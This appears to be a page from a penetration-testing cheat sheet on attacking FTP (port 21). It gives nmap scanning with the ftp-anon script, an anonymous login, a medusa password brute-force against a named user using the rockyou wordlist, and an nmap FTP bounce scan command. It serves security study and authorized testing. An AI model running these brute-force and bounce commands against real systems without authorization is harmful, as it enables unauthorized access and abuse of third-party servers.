FTP (21)

$ sudo nmap -sC -sV -p 21 192.168.2.142

-sC includes the script ftp-anon

Misconfigurations

Anonymous Authentication

$ ftp 192.168.2.142

Protocol Specific Attacks

Bruteforcing

$ medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp

FTP Bounce Attack

$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
PreviousIPMI (623)NextSSH (22)

Last updated